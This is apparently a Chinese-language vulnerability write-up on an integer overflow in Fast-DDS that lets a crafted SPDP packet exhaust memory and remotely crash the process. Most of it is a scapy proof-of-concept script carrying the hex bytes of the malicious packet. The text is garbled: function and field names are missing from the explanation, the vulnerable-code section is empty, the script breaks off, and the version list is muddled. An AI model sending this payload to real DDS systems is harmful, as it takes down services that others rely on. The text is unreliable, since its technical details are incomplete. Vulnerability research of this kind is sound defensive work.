Fast-DDS 整数溢出导致远程 DoS 漏洞分析

漏洞概述 这是一个位于 Fast-DDS 中的远程拒绝服务（DoS）漏洞。 触发条件：当启用 DDS Security 模式时。 攻击方式：攻击者可以构造恶意的 SPDP 数据包，篡改其中的 DATA Submessage（特别是 或 字段）。 漏洞原理：在 函数中，存在整数溢出漏洞。代码执行 检查时，由于 是 32 位整数，乘法运算可能发生溢出，导致比较结果错误（即检查被绕过）。 后果：随后代码执行 ，尝试分配巨大的内存空间（例如 ），导致 Out-of-Memory (OOM) 条件，最终导致 Fast-DDS 进程远程终止。 影响范围 受影响的 Fast-DDS 版本包括： <= 3.4.0 2.6.11 2.14.6 3.2.4 3.3.1 3.4.1 PoC 代码 1. 漏洞代码片段 (vulnerable code) 2. PoC 数据包与脚本 (poc packet) ```python from scapy.all import * payload = bytes.fromhex( "52 50 53 62 02 01 0f eb ba 10 1f 26 a3 08" "9f 45 19 27 00 01 00 00 ab 14 43 00 00 02 04 30" "15 07 03 03 00 00 10 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "7f 26 03 03 0f 46 19 17 ff 01 01 02 c2 00 00 00" "01 00 00 00 01 00 00 00 00 03 00 00 00 00 00 00" "02 03 00 00 00 00 00 04 00 01 00 00 50 00 10 00" "00 00 10 3f 17 26 a3 08 0f 00 19 1f 27 00 00 01" "22 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 ac 12 50 79 31 00 00 00 00 00 00 00" "00 10 00 00 00 55 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 31 00 10 00 00 00 00 00 00 00 50 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

Fast-DDS 整数溢出导致远程 DoS 漏洞分析

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Fast-DDS 整数溢出导致远程 DoS 漏洞分析

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！